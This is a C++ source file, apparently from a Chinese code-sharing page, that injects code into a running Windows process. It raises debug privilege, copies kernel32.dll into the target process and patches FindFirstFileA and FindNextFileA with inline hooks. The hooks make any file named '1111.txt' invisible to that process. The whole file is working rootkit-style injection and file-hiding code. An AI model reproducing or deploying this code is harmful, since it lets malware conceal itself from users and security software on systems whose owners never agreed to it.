?? inject.cpp
字號:
#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windows.h>
#include <malloc.h>
#include <stdio.h>
#include <Psapi.h>
#include <winsock2.h>
#include <Tlhelp32.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"user32")
#pragma comment(lib,"psapi")
#include <winbase.h>
typedef struct
{
HMODULE hModule;//句柄
LPVOID lpNewBaseOfDll;//備份dll句柄
MODULEINFO modinfo;//MODULEINFO結構
}DLLINFO, *PDLLINFO;
#pragma comment (lib,"Advapi32.lib")
BOOL InitDll(char *pszDll, PDLLINFO pDllInfo,HANDLE prochandle)
{
pDllInfo->hModule = GetModuleHandle(pszDll);//得到目標dll句柄,因為是本地信息,所以要保證本程序加載此dll
if(!pDllInfo->hModule)
{
printf("pDllInfo->hModule is null! in InitDll");
return 0;
}
if(!GetModuleInformation(GetCurrentProcess(), pDllInfo->hModule, &pDllInfo->modinfo, sizeof(MODULEINFO)))//得到目標dll信息
{
printf("Error:GetModuleInformation in InitDll");
return 0;
}
pDllInfo->lpNewBaseOfDll = VirtualAllocEx(prochandle,0,pDllInfo->modinfo.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申請空間并賦予相應權限(執行,讀寫)
if(!pDllInfo->lpNewBaseOfDll)
{
printf("Error:VirtualAllocEx in InitDll");//錯誤處理
return 0;
}
BYTE * buffer=(BYTE *)malloc(pDllInfo->modinfo.SizeOfImage);//分配緩沖,容納目標dll
ReadProcessMemory(prochandle,pDllInfo->modinfo.lpBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);//讀出,遠程dll內容
WriteProcessMemory(prochandle,pDllInfo->lpNewBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);//寫入備份dll
return 1;
}
BOOL __stdcall hook_FindNextFileA(HANDLE find,PWIN32_FIND_DATA data)
{
//__asm NOP//如果沒有使用得到kernel32.dll地址的語句,就要取消這句的注釋,因為沒有使用得到kernel32.dll地址的語句,函數初始化代碼就少了一句:push esi,為了保證oldproc可以被改寫,要增加一字節。
int oldproc=0x11223344;
int Getproc=0x11111111;
int keraddr;
int findnext;
int Geterror;
bool myret;
__asm
{
mov eax,fs:0x30
mov eax,[eax+0x0c]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax + 0x08]
mov keraddr,eax//得到kernel32.dll地址
}
__asm
{
push 0x00000000
push 0x726f7272
push 0x45747361
push 0x4c746547//在堆 中構造"GetLastError"
push esp
push keraddr
call Getproc
mov Geterror,eax//得到GetLastError地址
}
int temp;
__asm
{
push data
push find
mov eax,oldproc
call eax
mov temp,eax
}
char * myname=data->cFileName;
__asm
{
first:
mov eax,myname
mov ebx,0x31313131
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e
cmp [eax+4],ebx
jne myno//比較是否是"1111.txt"
push data
push myret
mov ebx,findnext
call ebx//如果是則調用findnextfile查找下一個文件
mov temp,eax
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first//如果文件枚舉完畢則返回,否則繼續比較
myno:
NOP
}
myret=(bool)temp;
return myret;
}
HANDLE __stdcall hook_FindFirstFileA(LPCTSTR find,LPWIN32_FIND_DATA data)
{
int oldproc=0x11223344;//原api地址
int Getproc=0xffbbaadd;//GetProcAddress地址
int keraddr;
int findnext;
int Geterror;
__asm
{
mov eax,fs:0x30
mov eax,[eax+0x0c]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax + 0x08]
mov keraddr,eax//得到kernel32.dll地址
}
__asm
{
push 0x00000041
push 0x656c6946
push 0x7478654e
push 0x646e6946//在堆 中構造"FindNextFileA"
push esp
push keraddr
call Getproc
mov findnext,eax//得到FindNextFileA地址
push 0x00000000
push 0x726f7272
push 0x45747361
push 0x4c746547//在堆 中構造"GetLastError"
push esp
push keraddr
call Getproc
mov Geterror,eax//得到GetLastError地址
}
HANDLE myret;
__asm
{
push data
push find
mov edx,oldproc
call edx//調用原函數
mov myret,eax
}
char * myname=data->cFileName;//指向找到的文件名
__asm
{
first:
mov eax,myname
mov ebx,0x31313131
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e
cmp [eax+4],ebx
jne myno//比較是否是"1111.txt"
push data
push myret
mov ebx,findnext
call ebx//如果是則調用findnextfile查找下一個文件
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first//如果文件枚舉完畢則返回,否則繼續比較
myno:
NOP
}
return myret;
}
int hook_api(PDLLINFO pDllInfo, char *name, DWORD hackfunc, DWORD *pNewFunc,HANDLE prochandle)
{
DWORD dw, dwOrigFunc;
MEMORY_BASIC_INFORMATION mbi;
dwOrigFunc = (DWORD)GetProcAddress(pDllInfo->hModule, name);//目標api地址,每個進程的api地址都是一樣的,只要找本進程的就可以了。
if(dwOrigFunc == NULL)
{
printf("Error:GetProcAddress in hook_api");//錯誤處理
return 0;
}
if(!VirtualQueryEx(prochandle,(void *)dwOrigFunc,&mbi,sizeof(MEMORY_BASIC_INFORMATION)))//獲取api所在內存信息
{
printf("Error:VirtualQueryEx in hook_api");
return 0;
}
if(!VirtualProtectEx(prochandle,mbi.BaseAddress,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw))//分配寫和執行權限
{
printf("Error:VirtualProtectEx in hook_api");
return 0;
}
LPVOID funcaddr=VirtualAllocEx(prochandle,0,500,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);//分配內存,寫入hook函數
WriteProcessMemory(prochandle,funcaddr,(void *)hackfunc/*func*/,500,0);
//計算原函數COPY的位置
*pNewFunc = dwOrigFunc - (DWORD)pDllInfo->modinfo.lpBaseOfDll + (DWORD)pDllInfo->lpNewBaseOfDll;
//修改原函數入口處內容
BYTE b8=0xb8;//mov eax,XX XX XX XX
WriteProcessMemory(prochandle,(LPVOID)dwOrigFunc,&b8,1,0);
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+1),&funcaddr,4,0);
BYTE e0ff[2]={0xFF,0xE0};//jmp eax
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+5),&e0ff,2,0);
DWORD temp=*pNewFunc;
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+11),&temp,4,0);//寫入備份api地址
temp=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+18),&temp,4,0);//寫入GetProcAddress
printf("func:%x,old:%x,new:%x\n",funcaddr,dwOrigFunc,*pNewFunc);//調試信息
return 1;
}
void UpToDebug()//調整令牌提升至debug權限
{
HANDLE token;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&token);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount =1;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token,0,&tp,sizeof(tp),0,0);
}
void main(int argc, char **argv)
{
UpToDebug();//提升至debug權限
HANDLE inhandle=OpenProcess(PROCESS_ALL_ACCESS,1,(DWORD)atoi(argv[1]));//打開目標進程
DLLINFO user32_dll;
if(!InitDll("kernel32.dll",&user32_dll,inhandle)) return;//備份目標dll
DWORD new_FindFirstFileA;
hook_api(&user32_dll, "FindFirstFileA", (DWORD)hook_FindFirstFileA, &new_FindFirstFileA,inhandle);//hook函數
hook_api(&user32_dll, "FindNextFileA", (DWORD)hook_FindNextFileA, &new_FindFirstFileA,inhandle);
return;
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -